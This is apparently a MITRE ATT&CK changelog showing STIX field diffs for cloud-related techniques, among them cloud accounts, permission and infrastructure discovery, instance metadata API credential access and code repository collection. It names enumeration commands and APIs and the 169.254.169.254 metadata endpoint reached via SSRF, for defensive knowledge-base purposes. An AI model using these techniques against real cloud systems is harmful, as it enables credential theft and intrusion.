| Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory. (Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation) Compromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment. | Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory.(Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation) Compromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment. Once a cloud account is compromised, an adversary may perform [Account Manipulation](https://attack.mitre.org/techniques/T1098) - for example, by adding [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) - to maintain persistence and potentially escalate their privileges. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-18 17:48:05.659000+00:00 | 2022-04-19 20:23:33.894000+00:00 |
| description | Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory. (Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation) Compromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment. | Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory.(Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation) Compromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment. Once a cloud account is compromised, an adversary may perform [Account Manipulation](https://attack.mitre.org/techniques/T1098) - for example, by adding [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) - to maintain persistence and potentially escalate their privileges. |
| x_mitre_version | 1.3 | 1.4 |
| Old Description | New Description |
|---|---|
Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group. With authenticated access there are several tools that can be used to find permissions groups. The Get-MsolRole PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts (Citation: Microsoft Msolrole)(Citation: GitHub Raindance). Azure CLI (AZ CLI) and the Google Cloud Identity Provider API also provide interfaces to obtain permissions groups. The command az ad user get-member-groups will list groups associated to a user account for Azure while the API endpoint GET https://cloudidentity.googleapis.com/v1/groups lists group resources available to a user for Google (Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)(Citation: Google Cloud Identity API Documentation). Adversaries may attempt to list ACLs for objects to determine the owner and other accounts with access to the object, for example, via the AWS GetBucketAcl API (Citation: AWS Get Bucket ACL). Using this information an adversary can target accounts with permissions to a given object or leverage accounts they have already compromised to access the object. |
Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.
With authenticated access there are several tools that can be used to find permissions groups. The Get-MsolRole PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts (Citation: Microsoft Msolrole)(Citation: GitHub Raindance).
Azure CLI (AZ CLI) and the Google Cloud Identity Provider API also provide interfaces to obtain permissions groups. The command az ad user get-member-groups will list groups associated to a user account for Azure while the API endpoint GET https://cloudidentity.googleapis.com/v1/groups lists group resources available to a user for Google.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)(Citation: Google Cloud Identity API Documentation)
Adversaries may attempt to list ACLs for objects to determine the owner and other accounts with access to the object, for example, via the AWS GetBucketAcl API (Citation: AWS Get Bucket ACL). Using this information an adversary can target accounts with permissions to a given object or leverage accounts they have already compromised to access the object. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-06-25 12:13:37.940000+00:00 | 2022-04-19 02:44:58.838000+00:00 |
| description | Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.
With authenticated access there are several tools that can be used to find permissions groups. The Get-MsolRole PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts (Citation: Microsoft Msolrole)(Citation: GitHub Raindance).
Azure CLI (AZ CLI) and the Google Cloud Identity Provider API also provide interfaces to obtain permissions groups. The command az ad user get-member-groups will list groups associated to a user account for Azure while the API endpoint GET https://cloudidentity.googleapis.com/v1/groups lists group resources available to a user for Google (Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)(Citation: Google Cloud Identity API Documentation).
Adversaries may attempt to list ACLs for objects to determine the owner and other accounts with access to the object, for example, via the AWS GetBucketAcl API (Citation: AWS Get Bucket ACL). Using this information an adversary can target accounts with permissions to a given object or leverage accounts they have already compromised to access the object. |
Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.
With authenticated access there are several tools that can be used to find permissions groups. The Get-MsolRole PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts (Citation: Microsoft Msolrole)(Citation: GitHub Raindance).
Azure CLI (AZ CLI) and the Google Cloud Identity Provider API also provide interfaces to obtain permissions groups. The command az ad user get-member-groups will list groups associated to a user account for Azure while the API endpoint GET https://cloudidentity.googleapis.com/v1/groups lists group resources available to a user for Google.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)(Citation: Google Cloud Identity API Documentation)
Adversaries may attempt to list ACLs for objects to determine the owner and other accounts with access to the object, for example, via the AWS GetBucketAcl API (Citation: AWS Get Bucket ACL). Using this information an adversary can target accounts with permissions to a given object or leverage accounts they have already compromised to access the object. |
| external_references[1]['source_name'] | Microsoft Msolrole | AWS Get Bucket ACL |
| external_references[1]['description'] | Microsoft. (n.d.). Get-MsolRole. Retrieved October 6, 2019. | Amazon Web Services. (n.d.). Retrieved May 28, 2021. |
| external_references[1]['url'] | https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrole?view=azureadps-1.0 | https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetBucketAcl.html |
| external_references[2]['source_name'] | GitHub Raindance | Black Hills Red Teaming MS AD Azure, 2018 |
| external_references[2]['description'] | Stringer, M.. (2018, November 21). RainDance. Retrieved October 6, 2019. | Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active Directory Leaks via Azure. Retrieved October 6, 2019. |
| external_references[2]['url'] | https://github.com/True-Demon/raindance | https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/ |
| external_references[3]['source_name'] | Microsoft AZ CLI | Google Cloud Identity API Documentation |
| external_references[3]['description'] | Microsoft. (n.d.). az ad user. Retrieved October 6, 2019. | Google. (n.d.). Retrieved March 16, 2021. |
| external_references[3]['url'] | https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest | https://cloud.google.com/identity/docs/reference/rest |
| external_references[4]['source_name'] | Black Hills Red Teaming MS AD Azure, 2018 | Microsoft AZ CLI |
| external_references[4]['description'] | Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active Directory Leaks via Azure. Retrieved October 6, 2019. | Microsoft. (n.d.). az ad user. Retrieved October 6, 2019. |
| external_references[4]['url'] | https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/ | https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest |
| external_references[5]['source_name'] | Google Cloud Identity API Documentation | Microsoft Msolrole |
| external_references[5]['description'] | Google. (n.d.). Retrieved March 16, 2021. | Microsoft. (n.d.). Get-MsolRole. Retrieved October 6, 2019. |
| external_references[5]['url'] | https://cloud.google.com/identity/docs/reference/rest | https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrole?view=azureadps-1.0 |
| external_references[6]['source_name'] | AWS Get Bucket ACL | GitHub Raindance |
| external_references[6]['description'] | Amazon Web Services. (n.d.). Retrieved May 28, 2021. | Stringer, M.. (2018, November 21). RainDance. Retrieved October 6, 2019. |
| external_references[6]['url'] | https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetBucketAcl.html | https://github.com/True-Demon/raindance |
| x_mitre_contributors[1] | Isif Ibrahima | Isif Ibrahima, Mandiant |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Group: Group Enumeration |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Group: Group Enumeration |
| Old Description | New Description |
|---|---|
An adversary may attempt to discover resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services. Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a DescribeInstances API within the Amazon EC2 API that can return information about one or more instances within an account, the ListBuckets API that returns a list of all buckets owned by the authenticated sender of the request, or the GetPublicAccessBlock API to retrieve access block configuration for a bucket (Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block). Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command az vm list lists details of virtual machines.(Citation: Microsoft AZ CLI) An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as DescribeDBInstances to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves. |
An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a DescribeInstances API within the Amazon EC2 API that can return information about one or more instances within an account, the ListBuckets API that returns a list of all buckets owned by the authenticated sender of the request, the HeadBucket API to determine a bucket’s existence along with access permissions of the request sender, or the GetPublicAccessBlock API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command az vm list lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as DescribeDBInstances to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves. |
Dropped Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-09-02 14:42:19.761000+00:00 | 2022-04-20 19:03:12.977000+00:00 |
| description | An adversary may attempt to discover resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a DescribeInstances API within the Amazon EC2 API that can return information about one or more instances within an account, the ListBuckets API that returns a list of all buckets owned by the authenticated sender of the request, or the GetPublicAccessBlock API to retrieve access block configuration for a bucket (Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block).
Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command az vm list lists details of virtual machines.(Citation: Microsoft AZ CLI)
An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as DescribeDBInstances to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves. |
An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a DescribeInstances API within the Amazon EC2 API that can return information about one or more instances within an account, the ListBuckets API that returns a list of all buckets owned by the authenticated sender of the request, the HeadBucket API to determine a bucket’s existence along with access permissions of the request sender, or the GetPublicAccessBlock API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command az vm list lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as DescribeDBInstances to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves. |
| external_references[1]['source_name'] | Amazon Describe Instance | Expel IO Evil in AWS |
| external_references[1]['description'] | Amazon. (n.d.). describe-instance-information. Retrieved March 3, 2020. | A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding Evil in AWS. Retrieved June 25, 2020. |
| external_references[1]['url'] | https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html | https://expel.io/blog/finding-evil-in-aws/ |
| external_references[2]['source_name'] | Amazon Describe Instances API | AWS Head Bucket |
| external_references[2]['description'] | Amazon. (n.d.). DescribeInstances. Retrieved May 26, 2020. | Amazon Web Services. (n.d.). AWS HeadBucket. Retrieved February 14, 2022. |
| external_references[2]['url'] | https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html | https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html |
| external_references[4]['source_name'] | Google Compute Instances | AWS Describe DB Instances |
| external_references[4]['description'] | Google. (n.d.). gcloud compute instances list. Retrieved May 26, 2020. | Amazon Web Services. (n.d.). Retrieved May 28, 2021. |
| external_references[4]['url'] | https://cloud.google.com/sdk/gcloud/reference/compute/instances/list | https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html |
| external_references[5]['source_name'] | Microsoft AZ CLI | Amazon Describe Instance |
| external_references[5]['description'] | Microsoft. (n.d.). az ad user. Retrieved October 6, 2019. | Amazon. (n.d.). describe-instance-information. Retrieved March 3, 2020. |
| external_references[5]['url'] | https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest | https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html |
| external_references[6]['source_name'] | Expel IO Evil in AWS | Amazon Describe Instances API |
| external_references[6]['description'] | A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding Evil in AWS. Retrieved June 25, 2020. | Amazon. (n.d.). DescribeInstances. Retrieved May 26, 2020. |
| external_references[6]['url'] | https://expel.io/blog/finding-evil-in-aws/ | https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html |
| external_references[7]['source_name'] | Mandiant M-Trends 2020 | Google Compute Instances |
| external_references[7]['description'] | Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020. | Google. (n.d.). gcloud compute instances list. Retrieved May 26, 2020. |
| external_references[7]['url'] | https://content.fireeye.com/m-trends/rpt-m-trends-2020 | https://cloud.google.com/sdk/gcloud/reference/compute/instances/list |
| external_references[8]['source_name'] | AWS Describe DB Instances | Mandiant M-Trends 2020 |
| external_references[8]['description'] | Amazon Web Services. (n.d.). Retrieved May 28, 2021. | Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020. |
| external_references[8]['url'] | https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html | https://content.fireeye.com/m-trends/rpt-m-trends-2020 |
| x_mitre_contributors[1] | Isif Ibrahima | Praetorian |
| x_mitre_contributors[2] | Praetorian | Isif Ibrahima, Mandiant |
| x_mitre_data_sources[0] | Instance: Instance Metadata | Cloud Storage: Cloud Storage Enumeration |
| x_mitre_detection | Establish centralized logging for the activity of cloud infrastructure components. Monitor logs for actions that could be taken to gather information about cloud infrastructure, including the use of discovery API calls by new or unexpected users. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones. | Establish centralized logging for the activity of cloud infrastructure components. Monitor logs for actions that could be taken to gather information about cloud infrastructure, including the use of discovery API calls by new or unexpected users and enumerations from unknown or malicious IP addresses. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones. |
| x_mitre_version | 1.2 | 1.3 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Microsoft AZ CLI', 'description': 'Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.', 'url': 'https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest'} | |
| external_references | {'source_name': 'Malwarebytes OSINT Leaky Buckets - Hioureas', 'description': 'Vasilios Hioureas. (2019, September 13). Hacking with AWS: incorporating leaky buckets into your OSINT workflow. Retrieved February 14, 2022.', 'url': 'https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/'} |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Snapshot: Snapshot Metadata | |
| x_mitre_data_sources | Cloud Storage: Cloud Storage Metadata | |
| x_mitre_data_sources | Cloud Storage: Cloud Storage Enumeration | |
| x_mitre_data_sources | Volume: Volume Metadata |
| Old Description | New Description |
|---|---|
Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data. Most cloud service providers support a Cloud Instance Metadata API which is a service provided to running virtual instances that allows applications to access information about the running virtual instance. Available information generally includes name, security group, and additional metadata including sensitive data such as credentials and UserData scripts that may contain additional secrets. The Instance Metadata API is provided as a convenience to assist in managing applications and is accessible by anyone who can access the instance.(Citation: AWS Instance Metadata API) A cloud metadata API has been used in at least one high profile compromise.(Citation: Krebs Capital One August 2019) If adversaries have a presence on the running virtual instance, they may query the Instance Metadata API directly to identify credentials that grant access to additional resources. Additionally, attackers may exploit a Server-Side Request Forgery (SSRF) vulnerability in a public facing web proxy that allows the attacker to gain access to the sensitive information via a request to the Instance Metadata API.(Citation: RedLock Instance Metadata API 2018) The de facto standard across cloud service providers is to host the Instance Metadata API at http[:]//169.254.169.254. |
Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.
Most cloud service providers support a Cloud Instance Metadata API which is a service provided to running virtual instances that allows applications to access information about the running virtual instance. Available information generally includes name, security group, and additional metadata including sensitive data such as credentials and UserData scripts that may contain additional secrets. The Instance Metadata API is provided as a convenience to assist in managing applications and is accessible by anyone who can access the instance.(Citation: AWS Instance Metadata API) A cloud metadata API has been used in at least one high profile compromise.(Citation: Krebs Capital One August 2019)
If adversaries have a presence on the running virtual instance, they may query the Instance Metadata API directly to identify credentials that grant access to additional resources. Additionally, adversaries may exploit a Server-Side Request Forgery (SSRF) vulnerability in a public facing web proxy that allows them to gain access to the sensitive information via a request to the Instance Metadata API.(Citation: RedLock Instance Metadata API 2018)
The de facto standard across cloud service providers is to host the Instance Metadata API at http[:]//169.254.169.254.
|
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-03-31 19:41:06.948000+00:00 | 2022-03-08 21:37:23.589000+00:00 |
| description | Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.
Most cloud service providers support a Cloud Instance Metadata API which is a service provided to running virtual instances that allows applications to access information about the running virtual instance. Available information generally includes name, security group, and additional metadata including sensitive data such as credentials and UserData scripts that may contain additional secrets. The Instance Metadata API is provided as a convenience to assist in managing applications and is accessible by anyone who can access the instance.(Citation: AWS Instance Metadata API) A cloud metadata API has been used in at least one high profile compromise.(Citation: Krebs Capital One August 2019)
If adversaries have a presence on the running virtual instance, they may query the Instance Metadata API directly to identify credentials that grant access to additional resources. Additionally, attackers may exploit a Server-Side Request Forgery (SSRF) vulnerability in a public facing web proxy that allows the attacker to gain access to the sensitive information via a request to the Instance Metadata API.(Citation: RedLock Instance Metadata API 2018)
The de facto standard across cloud service providers is to host the Instance Metadata API at http[:]//169.254.169.254.
|
Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.
Most cloud service providers support a Cloud Instance Metadata API which is a service provided to running virtual instances that allows applications to access information about the running virtual instance. Available information generally includes name, security group, and additional metadata including sensitive data such as credentials and UserData scripts that may contain additional secrets. The Instance Metadata API is provided as a convenience to assist in managing applications and is accessible by anyone who can access the instance.(Citation: AWS Instance Metadata API) A cloud metadata API has been used in at least one high profile compromise.(Citation: Krebs Capital One August 2019)
If adversaries have a presence on the running virtual instance, they may query the Instance Metadata API directly to identify credentials that grant access to additional resources. Additionally, adversaries may exploit a Server-Side Request Forgery (SSRF) vulnerability in a public facing web proxy that allows them to gain access to the sensitive information via a request to the Instance Metadata API.(Citation: RedLock Instance Metadata API 2018)
The de facto standard across cloud service providers is to host the Instance Metadata API at http[:]//169.254.169.254.
|
| x_mitre_version | 1.2 | 1.3 |
| Description |
|---|
| Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific objects from cloud storage. Similar to [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) on a local host, after identifying available storage services (i.e. [Cloud Infrastructure Discovery](https://attack.mitre.org/techniques/T1580)) adversaries may access the contents/objects stored in cloud infrastructure. Cloud service providers offer APIs allowing users to enumerate objects stored within cloud storage. Examples include ListObjectsV2 in AWS (Citation: ListObjectsV2) and List Blobs in Azure(Citation: List Blobs) . |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-07 18:19:25.352000+00:00 | 2022-04-11 22:29:43.677000+00:00 |
| x_mitre_contributors[1] | Isif Ibrahima | Isif Ibrahima, Mandiant |
| Old Description | New Description |
|---|---|
| Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git. Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software's source code. Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe) | Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git. Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software's source code. Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe) **Note:** This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1593/003), which focuses on conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043) via public code repositories. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-16 01:35:43.483000+00:00 | 2022-10-18 22:44:01.723000+00:00 |
| description | Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git. Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software's source code. Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe) | Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git. Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software's source code. Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe) **Note:** This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1593/003), which focuses on conducting 